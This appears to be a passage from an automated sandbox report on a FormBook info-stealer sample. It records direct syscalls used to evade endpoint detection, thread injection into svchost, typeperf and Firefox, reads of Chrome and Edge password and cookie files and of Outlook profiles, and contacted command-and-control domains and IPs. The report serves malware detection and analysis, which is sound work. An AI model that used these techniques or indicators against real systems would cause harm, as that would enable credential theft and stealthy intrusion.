            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB368C mov eax, dword ptr fs:[00000030h]9_2_03CB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB368C mov eax, dword ptr fs:[00000030h]9_2_03CB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB368C mov eax, dword ptr fs:[00000030h]9_2_03CB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C34690 mov eax, dword ptr fs:[00000030h]9_2_03C34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C34690 mov eax, dword ptr fs:[00000030h]9_2_03C34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]9_2_03C6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2D6AA mov eax, dword ptr fs:[00000030h]9_2_03C2D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2D6AA mov eax, dword ptr fs:[00000030h]9_2_03C2D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C276B2 mov eax, dword ptr fs:[00000030h]9_2_03C276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C276B2 mov eax, dword ptr fs:[00000030h]9_2_03C276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C276B2 mov eax, dword ptr fs:[00000030h]9_2_03C276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C666B0 mov eax, dword ptr fs:[00000030h]9_2_03C666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4C640 mov eax, dword ptr fs:[00000030h]9_2_03C4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF866E mov eax, dword ptr fs:[00000030h]9_2_03CF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF866E mov eax, dword ptr fs:[00000030h]9_2_03CF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6A660 mov eax, dword ptr fs:[00000030h]9_2_03C6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6A660 mov eax, dword ptr fs:[00000030h]9_2_03C6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C69660 mov eax, dword ptr fs:[00000030h]9_2_03C69660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C69660 mov eax, dword ptr fs:[00000030h]9_2_03C69660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C62674 mov eax, dword ptr fs:[00000030h]9_2_03C62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C61607 mov eax, dword ptr fs:[00000030h]9_2_03C61607
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CAE609 mov eax, dword ptr fs:[00000030h]9_2_03CAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6F603 mov eax, dword ptr fs:[00000030h]9_2_03C6F603
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4260B mov eax, dword ptr fs:[00000030h]9_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4260B mov eax, dword ptr fs:[00000030h]9_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4260B mov eax, dword ptr fs:[00000030h]9_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4260B mov eax, dword ptr fs:[00000030h]9_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4260B mov eax, dword ptr fs:[00000030h]9_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4260B mov eax, dword ptr fs:[00000030h]9_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4260B mov eax, dword ptr fs:[00000030h]9_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C33616 mov eax, dword ptr fs:[00000030h]9_2_03C33616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C33616 mov eax, dword ptr fs:[00000030h]9_2_03C33616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72619 mov eax, dword ptr fs:[00000030h]9_2_03C72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4E627 mov eax, dword ptr fs:[00000030h]9_2_03C4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F626 mov eax, dword ptr fs:[00000030h]9_2_03C2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F626 mov eax, dword ptr fs:[00000030h]9_2_03C2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F626 mov eax, dword ptr fs:[00000030h]9_2_03C2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F626 mov eax, dword ptr fs:[00000030h]9_2_03C2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F626 mov eax, dword ptr fs:[00000030h]9_2_03C2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F626 mov eax, dword ptr fs:[00000030h]9_2_03C2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F626 mov eax, dword ptr fs:[00000030h]9_2_03C2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F626 mov eax, dword ptr fs:[00000030h]9_2_03C2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F626 mov eax, dword ptr fs:[00000030h]9_2_03C2F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C66620 mov eax, dword ptr fs:[00000030h]9_2_03C66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D05636 mov eax, dword ptr fs:[00000030h]9_2_03D05636
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C68620 mov eax, dword ptr fs:[00000030h]9_2_03C68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3262C mov eax, dword ptr fs:[00000030h]9_2_03C3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C655C0 mov eax, dword ptr fs:[00000030h]9_2_03C655C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D035D7 mov eax, dword ptr fs:[00000030h]9_2_03D035D7

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtClose: Direct from: 0x77762B6C
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\typeperf.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: NULL target: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: NULL target: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\typeperf.exeThread register set: target process: 7668Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\typeperf.exeThread APC queued: target process: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3035008Jump to behavior
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\sa7Bw41TUq.exe"Jump to behavior
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeProcess created: C:\Windows\SysWOW64\typeperf.exe "C:\Windows\SysWOW64\typeperf.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: uxEGEjhWYrJv.exe, 0000000B.00000000.1558784686.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000B.00000002.3737395933.0000000000FD0000.00000002.00000001.00040000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000000.1757198063.0000000001160000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: uxEGEjhWYrJv.exe, 0000000B.00000000.1558784686.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000B.00000002.3737395933.0000000000FD0000.00000002.00000001.00040000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000000.1757198063.0000000001160000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: uxEGEjhWYrJv.exe, 0000000B.00000000.1558784686.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000B.00000002.3737395933.0000000000FD0000.00000002.00000001.00040000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000000.1757198063.0000000001160000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
            Source: uxEGEjhWYrJv.exe, 0000000B.00000000.1558784686.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000B.00000002.3737395933.0000000000FD0000.00000002.00000001.00040000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000000.1757198063.0000000001160000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: sa7Bw41TUq.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.3737461666.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3737315515.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1688985587.0000000009690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1671982092.00000000067E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3737482520.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3739752184.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\typeperf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\typeperf.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.3737461666.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3737315515.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1688985587.0000000009690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1671982092.00000000067E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3737482520.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3739752184.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		412
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Abuse Elevation Control Mechanism            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
            Obfuscated Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials12
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529872 Sample: sa7Bw41TUq.exe Startdate: 09/10/2024 Architecture: WINDOWS Score: 100 28 www.mecateg.xyz 2->28 30 www.zingara.life 2->30 32 22 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 3 other signatures 2->50 10 sa7Bw41TUq.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 uxEGEjhWYrJv.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 typeperf.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 uxEGEjhWYrJv.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.mecateg.xyz 162.0.238.238, 49985, 49986, 49987 NAMECHEAP-NETUS Canada 22->34 36 bluegirls.blog 195.110.124.133, 49869, 80 REGISTER-ASIT Italy 22->36 38 7 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            sa7Bw41TUq.exe61%ReversingLabsWin32.Backdoor.FormBook
            sa7Bw41TUq.exe100%AviraHEUR/AGEN.1321671
            sa7Bw41TUq.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
